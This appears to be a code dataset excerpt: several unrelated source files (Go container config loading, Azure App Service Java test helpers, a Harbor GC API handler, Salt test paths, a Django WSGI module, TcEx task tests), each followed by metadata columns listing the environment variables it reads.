// default config.
// None of these files are required, and not all fields need to be specified
// in each file, only the fields you want to override.
// The system defaults container config files can be overwritten using the
// CONTAINERS_CONF environment variable. This is usually done for testing.
func Default() (*Config, error) {
configMutex.Lock()
defer configMutex.Unlock()
if config != nil || configErr != nil {
return config, configErr
}
return defConfig()
}
func defConfig() (*Config, error) {
config, configErr = NewConfig("")
return config, configErr
}
func Path() string {
if path := os.Getenv("CONTAINERS_CONF"); path != "" {
return path
}
if unshare.IsRootless() {
if rpath, err := rootlessConfigPath(); err == nil {
return rpath
}
return "$HOME/" + UserOverrideContainersConfig
}
return OverrideContainersConfig
}
// ReadCustomConfig reads the custom config and only generates a config based on it
// If the custom config file does not exists, function will return an empty config
func ReadCustomConfig() (*Config, error) {
path, err := customConfigFile()
if err != nil {
return nil, err
}
newConfig := &Config{}
if _, err := os.Stat(path); err == nil {
if err := readConfigFromFile(path, newConfig); err != nil {
return nil, err
}
} else {
if !os.IsNotExist(err) {
return nil, err
}
}
return newConfig, nil
}
// Write writes the configuration to the default file
func (c *Config) Write() error {
var err error
path, err := customConfigFile()
if err != nil {
return err
}
if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil {
return err
}
configFile, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0644)
if err != nil {
return err
}
defer configFile.Close()
enc := toml.NewEncoder(configFile)
if err := enc.Encode(c); err != nil {
return err
}
return nil
}
// Reload clean the cached config and reloads the configuration from containers.conf files
// This function is meant to be used for long-running processes that need to reload potential changes made to
// the cached containers.conf files.
func Reload() (*Config, error) {
configMutex.Lock()
defer configMutex.Unlock()
return defConfig()
}
func (c *Config) ActiveDestination() (uri, identity string, err error) {
if uri, found := os.LookupEnv("CONTAINER_HOST"); found {
if v, found := os.LookupEnv("CONTAINER_SSHKEY"); found {
identity = v
}
return uri, identity, nil
}
connEnv := os.Getenv("CONTAINER_CONNECTION")
switch {
case connEnv != "":
d, found := c.Engine.ServiceDestinations[connEnv]
if !found {
return "", "", errors.Errorf("environment variable CONTAINER_CONNECTION=%q service destination not found", connEnv)
}
return d.URI, d.Identity, nil
case c.Engine.ActiveService != "":
d, found := c.Engine.ServiceDestinations[c.Engine.ActiveService]
if !found {
return "", "", errors.Errorf("%q service destination not found", c.Engine.ActiveService)
}
return d.URI, d.Identity, nil
case c.Engine.RemoteURI != "":
return c.Engine.RemoteURI, c.Engine.RemoteIdentity, nil
}
return "", "", errors.New("no service destination configured")
}
// FindHelperBinary will search the given binary name in the configured directories.
// If searchPATH is set to true it will also search in $PATH.
func (c *Config) FindHelperBinary(name string, searchPATH bool) (string, error) {
dir_list := c.Engine.HelperBinariesDir
// If set, search this directory first. This is used in testing.
if dir, found := os.LookupEnv("CONTAINERS_HELPER_BINARY_DIR"); found {
dir_list = append([]string{dir}, dir_list...)
}
for _, path := range dir_list {
fullpath := filepath.Join(path, name)
if fi, err := os.Stat(fullpath); err == nil && fi.Mode().IsRegular() {
return fullpath, nil
}
}
if searchPATH {
return exec.LookPath(name)
}
configHint := "To resolve this error, set the helper_binaries_dir key in the `[engine]` section of containers.conf to the directory containing your helper binaries."
if len(c.Engine.HelperBinariesDir) == 0 {
return "", errors.Errorf("could not find %q because there are no helper binary directories configured. %s", name, configHint)
}
return "", errors.Errorf("could not find %q in one of %v. %s", name, c.Engine.HelperBinariesDir, configHint)
}
// ImageCopyTmpDir default directory to store tempory image files during copy
func (c *Config) ImageCopyTmpDir() (string, error) {
if path, found := os.LookupEnv("TMPDIR"); found {
return path, nil
}
switch c.Engine.ImageCopyTmpDir {
case "":
return "", nil
case "storage":
return filepath.Join(c.Engine.graphRoot, "tmp"), nil
default:
if filepath.IsAbs(c.Engine.ImageCopyTmpDir) {
return c.Engine.ImageCopyTmpDir, nil
}
}
return "", errors.Errorf("invalid image_copy_tmp_dir value %q (relative paths are not accepted)", c.Engine.ImageCopyTmpDir)
}
// setupEnv sets the environment variables for the engine
func (c *Config) setupEnv() error {
for _, env := range c.Engine.Env {
splitEnv := strings.SplitN(env, "=", 2)
if len(splitEnv) != 2 {
logrus.Warnf("invalid environment variable for engine %s, valid configuration is KEY=value pair", env)
continue
}
// skip if the env is already defined
if _, ok := os.LookupEnv(splitEnv[0]); ok {
logrus.Debugf("environment variable %s is already defined, skip the settings from containers.conf", splitEnv[0])
continue
}
if err := os.Setenv(splitEnv[0], splitEnv[1]); err != nil {
return err
}
}
return nil
}
|
[
"\"CONTAINERS_CONF\"",
"\"DBUS_SESSION_BUS_ADDRESS\"",
"\"XDG_CONFIG_HOME\"",
"\"CONTAINERS_CONF\"",
"\"CONTAINER_CONNECTION\""
] |
[] |
[
"CONTAINER_CONNECTION",
"DBUS_SESSION_BUS_ADDRESS",
"XDG_CONFIG_HOME",
"CONTAINERS_CONF"
] |
[]
|
["CONTAINER_CONNECTION", "DBUS_SESSION_BUS_ADDRESS", "XDG_CONFIG_HOME", "CONTAINERS_CONF"]
|
go
| 4 | 0 | |
sdk/appservice/mgmt/src/test/java/com/azure/resourcemanager/appservice/AppServiceTest.java
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.resourcemanager.appservice;
import com.azure.core.annotation.BodyParam;
import com.azure.core.annotation.ExpectedResponses;
import com.azure.core.annotation.Get;
import com.azure.core.annotation.Host;
import com.azure.core.annotation.HostParam;
import com.azure.core.annotation.PathParam;
import com.azure.core.annotation.Post;
import com.azure.core.annotation.ServiceInterface;
import com.azure.core.http.HttpPipeline;
import com.azure.core.http.HttpPipelineBuilder;
import com.azure.core.http.policy.HttpLogDetailLevel;
import com.azure.core.http.policy.HttpLogOptions;
import com.azure.core.http.policy.HttpLoggingPolicy;
import com.azure.core.http.policy.RetryPolicy;
import com.azure.core.http.rest.Response;
import com.azure.core.http.rest.RestProxy;
import com.azure.core.http.rest.SimpleResponse;
import com.azure.core.util.FluxUtil;
import com.azure.resourcemanager.appservice.implementation.AppServiceManager;
import com.azure.resourcemanager.keyvault.implementation.KeyVaultManager;
import com.azure.resourcemanager.resources.core.TestBase;
import com.azure.resourcemanager.resources.fluentcore.arm.CountryIsoCode;
import com.azure.resourcemanager.resources.fluentcore.arm.CountryPhoneCode;
import com.azure.resourcemanager.resources.fluentcore.arm.Region;
import com.azure.resourcemanager.resources.fluentcore.profile.AzureProfile;
import com.azure.resourcemanager.resources.ResourceManager;
import java.io.IOException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.time.temporal.ChronoUnit;
import org.apache.commons.net.ftp.FTP;
import org.apache.commons.net.ftp.FTPClient;
import org.junit.jupiter.api.Assertions;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
/** The base for app service tests. */
public class AppServiceTest extends TestBase {
protected ResourceManager resourceManager;
protected KeyVaultManager keyVaultManager;
protected AppServiceManager appServiceManager;
protected AppServiceDomain domain;
protected AppServiceCertificateOrder certificateOrder;
protected String rgName = "";
// private static OkHttpClient httpClient = new OkHttpClient.Builder().readTimeout(3, TimeUnit.MINUTES).build();
public AppServiceTest() {
}
AppServiceTest(RunCondition runCondition) {
super(runCondition);
}
@Override
protected void initializeClients(HttpPipeline httpPipeline, AzureProfile profile) {
rgName = generateRandomResourceName("javacsmrg", 20);
resourceManager =
ResourceManager.authenticate(httpPipeline, profile).withSdkContext(sdkContext).withDefaultSubscription();
keyVaultManager = KeyVaultManager.authenticate(httpPipeline, profile, sdkContext);
appServiceManager = AppServiceManager.authenticate(httpPipeline, profile, sdkContext);
// useExistingDomainAndCertificate();
// createNewDomainAndCertificate();
}
@Override
protected void cleanUpResources() {
resourceManager.resourceGroups().beginDeleteByName(rgName);
}
private void useExistingDomainAndCertificate() {
String rgName = "rgnemv24d683784f51d";
String certOrder = "wild2crt8b42374211";
String domainName = "jsdk79877.com";
if (System.getenv("appservice-group") != null) {
rgName = System.getenv("appservice-group");
}
if (System.getenv("appservice-domain") != null) {
domainName = System.getenv("appservice-domain");
}
if (System.getenv("appservice-certificateorder") != null) {
certOrder = System.getenv("appservice-certificateorder");
}
domain = appServiceManager.domains().getByResourceGroup(rgName, domainName);
certificateOrder = appServiceManager.certificateOrders().getByResourceGroup(rgName, certOrder);
}
private void createNewDomainAndCertificate() {
domain =
appServiceManager
.domains()
.define(System.getenv("appservice-domain"))
.withExistingResourceGroup(System.getenv("appservice-group"))
.defineRegistrantContact()
.withFirstName("Jon")
.withLastName("Doe")
.withEmail("[email protected]")
.withAddressLine1("123 4th Ave")
.withCity("Redmond")
.withStateOrProvince("WA")
.withCountry(CountryIsoCode.UNITED_STATES)
.withPostalCode("98052")
.withPhoneCountryCode(CountryPhoneCode.UNITED_STATES)
.withPhoneNumber("4258828080")
.attach()
.withDomainPrivacyEnabled(true)
.withAutoRenewEnabled(true)
.create();
certificateOrder =
appServiceManager
.certificateOrders()
.define(System.getenv("appservice-certificateorder"))
.withExistingResourceGroup(System.getenv("appservice-group"))
.withHostName("*." + domain.name())
.withWildcardSku()
.withDomainVerification(domain)
.withNewKeyVault("graphvault", Region.US_WEST)
.withValidYears(1)
.create();
}
/**
* Uploads a file to an Azure web app.
*
* @param profile the publishing profile for the web app.
* @param fileName the name of the file on server
* @param file the local file
*/
public static void uploadFileToWebApp(PublishingProfile profile, String fileName, InputStream file) {
FTPClient ftpClient = new FTPClient();
String[] ftpUrlSegments = profile.ftpUrl().split("/", 2);
String server = ftpUrlSegments[0];
String path = "./site/wwwroot/webapps";
if (fileName.contains("/")) {
int lastslash = fileName.lastIndexOf('/');
path = path + "/" + fileName.substring(0, lastslash);
fileName = fileName.substring(lastslash + 1);
}
try {
ftpClient.connect(server);
ftpClient.login(profile.ftpUsername(), profile.ftpPassword());
ftpClient.setFileType(FTP.BINARY_FILE_TYPE);
for (String segment : path.split("/")) {
if (!ftpClient.changeWorkingDirectory(segment)) {
ftpClient.makeDirectory(segment);
ftpClient.changeWorkingDirectory(segment);
}
}
ftpClient.storeFile(fileName, file);
ftpClient.disconnect();
} catch (IOException e) {
e.printStackTrace();
}
}
protected Response<String> curl(String urlString) throws IOException {
try {
return stringResponse(httpClient.getString(getHost(urlString), getPathAndQuery(urlString))).block();
} catch (MalformedURLException e) {
Assertions.fail();
return null;
}
}
protected String post(String urlString, String body) {
try {
return stringResponse(httpClient.postString(getHost(urlString), getPathAndQuery(urlString), body))
.block()
.getValue();
} catch (Exception e) {
return null;
}
}
private static Mono<SimpleResponse<String>> stringResponse(Mono<SimpleResponse<Flux<ByteBuffer>>> responseMono) {
return responseMono
.flatMap(
response ->
FluxUtil
.collectBytesInByteBufferStream(response.getValue())
.map(bytes -> new String(bytes, StandardCharsets.UTF_8))
.map(
str ->
new SimpleResponse<>(
response.getRequest(), response.getStatusCode(), response.getHeaders(), str)));
}
private static String getHost(String urlString) throws MalformedURLException {
URL url = new URL(urlString);
String protocol = url.getProtocol();
String host = url.getAuthority();
return protocol + "://" + host;
}
private static String getPathAndQuery(String urlString) throws MalformedURLException {
URL url = new URL(urlString);
String path = url.getPath();
String query = url.getQuery();
if (query != null && !query.isEmpty()) {
path = path + "?" + query;
}
return path;
}
protected WebAppTestClient httpClient =
RestProxy
.create(
WebAppTestClient.class,
new HttpPipelineBuilder()
.policies(
new HttpLoggingPolicy(new HttpLogOptions().setLogLevel(HttpLogDetailLevel.BODY_AND_HEADERS)),
new RetryPolicy("Retry-After", ChronoUnit.SECONDS))
.build());
@Host("{$host}")
@ServiceInterface(name = "WebAppTestClient")
private interface WebAppTestClient {
@Get("{path}")
@ExpectedResponses({200, 400, 404})
Mono<SimpleResponse<Flux<ByteBuffer>>> getString(
@HostParam("$host") String host, @PathParam(value = "path", encoded = true) String path);
@Post("{path}")
@ExpectedResponses({200, 400, 404})
Mono<SimpleResponse<Flux<ByteBuffer>>> postString(
@HostParam("$host") String host,
@PathParam(value = "path", encoded = true) String path,
@BodyParam("text/plain") String body);
}
}
|
[
"\"appservice-group\"",
"\"appservice-group\"",
"\"appservice-domain\"",
"\"appservice-domain\"",
"\"appservice-certificateorder\"",
"\"appservice-certificateorder\"",
"\"appservice-domain\"",
"\"appservice-group\"",
"\"appservice-certificateorder\"",
"\"appservice-group\""
] |
[] |
[
"appservice-group",
"appservice-certificateorder",
"appservice-domain"
] |
[]
|
["appservice-group", "appservice-certificateorder", "appservice-domain"]
|
java
| 3 | 0 | |
src/core/api/reg_gc.go
|
// Copyright 2018 Project Harbor Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package api
import (
"errors"
"net/http"
"os"
"strconv"
common_job "github.com/goharbor/harbor/src/common/job"
"github.com/goharbor/harbor/src/core/api/models"
)
// GCAPI handles request of harbor GC...
type GCAPI struct {
AJAPI
}
// Prepare validates the URL and parms, it needs the system admin permission.
func (gc *GCAPI) Prepare() {
gc.BaseController.Prepare()
if !gc.SecurityCtx.IsAuthenticated() {
gc.SendUnAuthorizedError(errors.New("UnAuthorized"))
return
}
if !gc.SecurityCtx.IsSysAdmin() {
gc.SendForbiddenError(errors.New(gc.SecurityCtx.GetUsername()))
return
}
}
// Post according to the request, it creates a cron schedule or a manual trigger for GC.
// create a daily schedule for GC
// {
// "schedule": {
// "type": "Daily",
// "cron": "0 0 0 * * *"
// }
// }
// create a manual trigger for GC
// {
// "schedule": {
// "type": "Manual"
// }
// }
func (gc *GCAPI) Post() {
ajr := models.AdminJobReq{}
isValid, err := gc.DecodeJSONReqAndValidate(&ajr)
if !isValid {
gc.SendBadRequestError(err)
return
}
ajr.Name = common_job.ImageGC
ajr.Parameters = map[string]interface{}{
"redis_url_reg": os.Getenv("_REDIS_URL_REG"),
}
gc.submit(&ajr)
gc.Redirect(http.StatusCreated, strconv.FormatInt(ajr.ID, 10))
}
// Put handles GC cron schedule update/delete.
// Request: delete the schedule of GC
// {
// "schedule": {
// "type": "None",
// "cron": ""
// }
// }
func (gc *GCAPI) Put() {
ajr := models.AdminJobReq{}
isValid, err := gc.DecodeJSONReqAndValidate(&ajr)
if !isValid {
gc.SendBadRequestError(err)
return
}
ajr.Name = common_job.ImageGC
ajr.Parameters = map[string]interface{}{
"redis_url_reg": os.Getenv("_REDIS_URL_REG"),
}
gc.updateSchedule(ajr)
}
// GetGC ...
func (gc *GCAPI) GetGC() {
id, err := gc.GetInt64FromPath(":id")
if err != nil {
gc.SendInternalServerError(errors.New("need to specify gc id"))
return
}
gc.get(id)
}
// List returns the top 10 executions of GC which includes manual and cron.
func (gc *GCAPI) List() {
gc.list(common_job.ImageGC)
}
// Get gets GC schedule ...
func (gc *GCAPI) Get() {
gc.getSchedule(common_job.ImageGC)
}
// GetLog ...
func (gc *GCAPI) GetLog() {
id, err := gc.GetInt64FromPath(":id")
if err != nil {
gc.SendBadRequestError(errors.New("invalid ID"))
return
}
gc.getLog(id)
}
|
[
"\"_REDIS_URL_REG\"",
"\"_REDIS_URL_REG\""
] |
[] |
[
"_REDIS_URL_REG"
] |
[]
|
["_REDIS_URL_REG"]
|
go
| 1 | 0 | |
tests/support/paths.py
|
"""
:codeauthor: Pedro Algarvio ([email protected])
:copyright: Copyright 2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.paths
~~~~~~~~~~~~~~~~~~~
Tests related paths
"""
import logging
import os
import re
import sys
import tempfile
import salt.utils.path
log = logging.getLogger(__name__)
TESTS_DIR = os.path.dirname(
os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
)
if TESTS_DIR.startswith("//"):
# Have we been given an initial double forward slash? Ditch it!
TESTS_DIR = TESTS_DIR[1:]
if sys.platform.startswith("win"):
TESTS_DIR = os.path.normcase(TESTS_DIR)
CODE_DIR = os.path.dirname(TESTS_DIR)
if sys.platform.startswith("win"):
CODE_DIR = CODE_DIR.replace("\\", "\\\\")
UNIT_TEST_DIR = os.path.join(TESTS_DIR, "unit")
INTEGRATION_TEST_DIR = os.path.join(TESTS_DIR, "integration")
MULTIMASTER_TEST_DIR = os.path.join(TESTS_DIR, "multimaster")
# Let's inject CODE_DIR so salt is importable if not there already
if TESTS_DIR in sys.path:
sys.path.remove(TESTS_DIR)
if CODE_DIR in sys.path and sys.path[0] != CODE_DIR:
sys.path.remove(CODE_DIR)
if CODE_DIR not in sys.path:
sys.path.insert(0, CODE_DIR)
if TESTS_DIR not in sys.path:
sys.path.insert(1, TESTS_DIR)
SYS_TMP_DIR = os.path.abspath(
os.path.realpath(
# Avoid ${TMPDIR} and gettempdir() on MacOS as they yield a base path too long
# for unix sockets: ``error: AF_UNIX path too long``
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
os.environ.get("TMPDIR", tempfile.gettempdir())
if not sys.platform.startswith("darwin")
else "/tmp"
)
)
TMP = os.path.join(SYS_TMP_DIR, "salt-tests-tmpdir")
TMP_ROOT_DIR = os.path.join(TMP, "rootdir")
FILES = os.path.join(INTEGRATION_TEST_DIR, "files")
BASE_FILES = os.path.join(INTEGRATION_TEST_DIR, "files", "file", "base")
PROD_FILES = os.path.join(INTEGRATION_TEST_DIR, "files", "file", "prod")
PYEXEC = "python{}.{}".format(*sys.version_info)
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, "mockbin")
SCRIPT_DIR = os.path.join(CODE_DIR, "scripts")
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-state-tree")
TMP_PILLAR_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-pillar-tree")
TMP_PRODENV_STATE_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-prodenv-state-tree")
TMP_PRODENV_PILLAR_TREE = os.path.join(SYS_TMP_DIR, "salt-temp-prodenv-pillar-tree")
TMP_CONF_DIR = TMP_MINION_CONF_DIR = os.path.join(TMP, "config")
TMP_SUB_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, "sub-minion")
TMP_SYNDIC_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, "syndic-minion")
TMP_SYNDIC_MASTER_CONF_DIR = os.path.join(TMP_CONF_DIR, "syndic-master")
TMP_MM_CONF_DIR = TMP_MM_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, "multimaster")
TMP_MM_SUB_CONF_DIR = TMP_MM_SUB_MINION_CONF_DIR = os.path.join(
TMP_CONF_DIR, "sub-multimaster"
)
TMP_PROXY_CONF_DIR = TMP_CONF_DIR
CONF_DIR = os.path.join(INTEGRATION_TEST_DIR, "files", "conf")
PILLAR_DIR = os.path.join(FILES, "pillar")
TMP_SCRIPT_DIR = os.path.join(TMP, "scripts")
ENGINES_DIR = os.path.join(FILES, "engines")
LOG_HANDLERS_DIR = os.path.join(FILES, "log_handlers")
def list_test_mods():
"""
A generator which returns all of the test files
"""
test_re = re.compile(r"^test_.+\.py$")
for dirname in (UNIT_TEST_DIR, INTEGRATION_TEST_DIR, MULTIMASTER_TEST_DIR):
test_type = os.path.basename(dirname)
for root, _, files in salt.utils.path.os_walk(dirname):
parent_mod = root[len(dirname) :].lstrip(os.sep).replace(os.sep, ".")
for filename in files:
if test_re.match(filename):
mod_name = test_type
if parent_mod:
mod_name += "." + parent_mod
mod_name += "." + filename[:-3]
yield mod_name
|
[] |
[] |
[
"TMPDIR"
] |
[]
|
["TMPDIR"]
|
python
| 1 | 0 | |
config/wsgi.py
|
"""
WSGI config for jsngram project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# jsngram directory.
app_path = os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(os.path.join(app_path, 'jsngram'))
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
tests/case_management/test_task_interface.py
|
"""Test the TcEx Threat Intel Module."""
# standard library
import os
import time
from datetime import datetime, timedelta
from random import randint
# first-party
from tcex.case_management.tql import TQL
from .cm_helpers import CMHelper, TestCaseManagement
class TestTask(TestCaseManagement):
"""Test TcEx CM Task Interface."""
def setup_method(self):
"""Configure setup before all tests."""
self.cm_helper = CMHelper('task')
self.cm = self.cm_helper.cm
self.tcex = self.cm_helper.tcex
def teardown_method(self):
"""Configure teardown before all tests."""
if os.getenv('TEARDOWN_METHOD') is None:
self.cm_helper.cleanup()
def test_task_api_options(self):
"""Test filter keywords."""
super().obj_api_options()
def test_task_code_gen(self):
"""Generate code and docstring from Options methods.
This is not truly a test case, but best place to store it for now.
"""
doc_string, filter_map, filter_class = super().obj_code_gen()
assert doc_string
assert filter_map
assert filter_class
def test_task_filter_keywords(self):
"""Test filter keywords."""
super().obj_filter_keywords()
def test_task_object_properties(self):
"""Test properties."""
super().obj_properties()
def test_task_object_properties_extra(self):
"""Test properties."""
super().obj_properties_extra()
def test_task_create_by_case_id(self, request):
"""Test Task Creation"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'workflow_phase': 0,
'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# run assertions on returned data
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
assert task.workflow_phase == task_data.get('workflow_phase')
assert task.workflow_step == task_data.get('workflow_step')
def test_task_create_by_case_xid(self, request):
"""Test Task Creation"""
# create case
case_xid = f'{request.node.name}-{time.time()}'
self.cm_helper.create_case(xid=case_xid)
# task data
task_data = {
'case_xid': case_xid,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'workflow_phase': 0,
'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# run assertions on returned data
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
assert task.workflow_phase == task_data.get('workflow_phase')
assert task.workflow_step == task_data.get('workflow_step')
def test_task_delete_by_id(self, request):
"""Test Artifact Deletion"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# delete the artifact
task.delete()
# test artifact is deleted
try:
task.get()
assert False
except RuntimeError:
pass
def test_task_get_many(self, request):
"""Test Task Get Many"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# iterate over all tasks looking for needle
for t in self.cm.tasks():
if t.name == task_data.get('name'):
assert task.description == task_data.get('description')
break
else:
assert False
def test_task_get_single_by_id(self, request):
"""Test Task Get Many"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'workflow_phase': 0,
'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
# add assignee
assignee_data = {'type': 'User', 'data': {'userName': os.getenv('API_ACCESS_ID')}}
task.assignee = assignee_data
# add note
notes_data = {
'data': [{'text': 'a note for test_task_get_single_by_id_properties'}],
}
task.notes = notes_data
# submit task
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get()
# run assertions on returned data
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
assert task.workflow_phase == task_data.get('workflow_phase')
assert task.workflow_step == task_data.get('workflow_step')
def test_task_update_properties(self, request):
"""Test updating artifacts properties"""
case = self.cm_helper.create_case()
task_data = {
'case_id': case.id,
'completed_date': datetime.now().isoformat(),
'description': f'a description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=2)).isoformat(),
'name': f'name-{request.node.name}',
'note_text': f'a note for {request.node.name}',
'status': 'Open',
# 'workflow_phase': 0,
# 'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create artifact
task = self.cm.task(**task_data)
task.submit()
# artifact data updated
task_data = {
'assignee': {'user_name': os.getenv('API_ACCESS_ID')},
'description': f'a updated description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=3)).isoformat(),
'name': f'updated-name-{request.node.name}',
'status': 'Closed',
'workflow_phase': 1,
'workflow_step': 2,
}
task.assignee = self.cm.assignee(**task_data.get('assignee'))
task.description = task_data.get('description')
task.due_date = task_data.get('due_date')
task.name = task_data.get('name')
# task.workflow_phase = task_data.get('workflow_phase')
# task.workflow_step = task_data.get('workflow_step')
task.submit()
task.get(all_available_fields=True)
assert task.assignee.user_name == task_data.get('assignee').get('user_name')
assert task.description == task_data.get('description')
assert task_data.get('due_date')[:10] in task.due_date
assert task.name == task_data.get('name')
# assert task.workflow_phase == task_data.get('workflow_phase')
# assert task.workflow_step == task_data.get('workflow_step')
def test_task_task_config_mapping(self):
"""Test Task Get Many"""
# create case
# task config data
task_config_data = [
{
'artifactType': 'ASN',
'dataType': 'String',
'intelType': 'indicator-ASN',
'name': 'dummy_field',
'uiElement': 'String',
'uiLabel': 'ui_label?',
}
]
# create task
task_data = {'config_task': task_config_data}
task = self.cm.task(**task_data)
counter = 0
for config_task in task.config_task.config_tasks:
counter += 1
assert config_task.as_dict is not None
assert config_task.body == {}
assert config_task.artifact_type == 'ASN'
assert config_task.data_type == 'String'
assert config_task.intel_type == 'indicator-ASN'
assert config_task.name == 'dummy_field'
assert config_task.required is None
assert config_task.ui_element == 'String'
assert config_task.ui_label == 'ui_label?'
assert task.config_task.as_dict is not None
assert task.config_task.body == {}
assert counter == 1
def test_task_get_single_by_id_properties(self, request):
"""Test Task Get Many"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'case_xid': case.xid,
'completed_date': datetime.now().isoformat(),
'description': f'a description from {request.node.name}',
'due_date': (datetime.now() + timedelta(days=2)).isoformat(),
'name': f'name-{request.node.name}',
'note_text': f'a note for {request.node.name}',
'status': 'Open',
# 'workflow_phase': 0,
# 'workflow_step': 1,
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task()
# add properties
task.case_id = task_data.get('case_id')
task.case_xid = task_data.get('case_xid')
task.completed_date = task_data.get('completed_date')
task.description = task_data.get('description')
task.due_date = task_data.get('due_date')
task.name = task_data.get('name')
task.status = task_data.get('status')
# task.workflow_phase = task_data.get('workflow_phase')
# task.workflow_step = task_data.get('workflow_step')
task.xid = task_data.get('xid')
# add artifacts
artifact_data = {
'intel_type': 'indicator-ASN',
'summary': f'asn{randint(100, 999)}',
'type': 'ASN',
}
task.add_artifact(**artifact_data)
# add assignee
assignee = self.cm.assignee(type='User', user_name=os.getenv('API_ACCESS_ID'))
task.assignee = assignee
# add note
task.add_note(text=task_data.get('note_text'))
task.submit()
# get task from API to use in asserts
task = self.cm.task(id=task.id)
task.get(all_available_fields=True)
# run assertions on returned data
assert task.assignee.user_name == os.getenv('API_ACCESS_ID')
assert task.case_id == task_data.get('case_id')
assert task.case_xid is None # note returned with task data
assert task_data.get('completed_date')[:10] in task.completed_date
assert task.description == task_data.get('description')
assert task_data.get('due_date')[:10] in task.due_date
assert task.name == task_data.get('name')
for note in task.notes:
if note.text == task_data.get('note_text'):
break
else:
assert False, 'Note not found'
assert task.status == task_data.get('status')
# assert task.workflow_phase == task_data.get('workflow_phase')
# assert task.workflow_step == task_data.get('workflow_step')
assert task.xid == task_data.get('xid')
# assert read-only data
assert task.completed_by is None # not returned in the response
assert task.config_playbook is None # not returned in the response
assert task.config_task.config_tasks == [] # not returned in the response
assert task.dependent_on_id is None # not returned in the response
assert task.duration is None # not returned in the response
assert task.parent_case.id == task_data.get('case_id')
assert task.required is False
# test as_entity
assert task.as_entity.get('value') == task_data.get('name')
def test_task_get_by_tql_filter_automated(self, request):
"""Test Task Get by TQL"""
# create case
case = self.cm_helper.create_case()
# task data
task_data = {
'case_id': case.id,
'description': f'a description from {request.node.name}',
'name': f'name-{request.node.name}',
'xid': f'{request.node.name}-{time.time()}',
}
# create task
task = self.cm.task(**task_data)
task.submit()
# retrieve tasks using TQL
tasks = self.cm.tasks()
tasks.filter.case_id(TQL.Operator.EQ, case.id)
tasks.filter.automated(TQL.Operator.EQ, False)
for task in tasks:
assert task.description == task_data.get('description')
assert task.name == task_data.get('name')
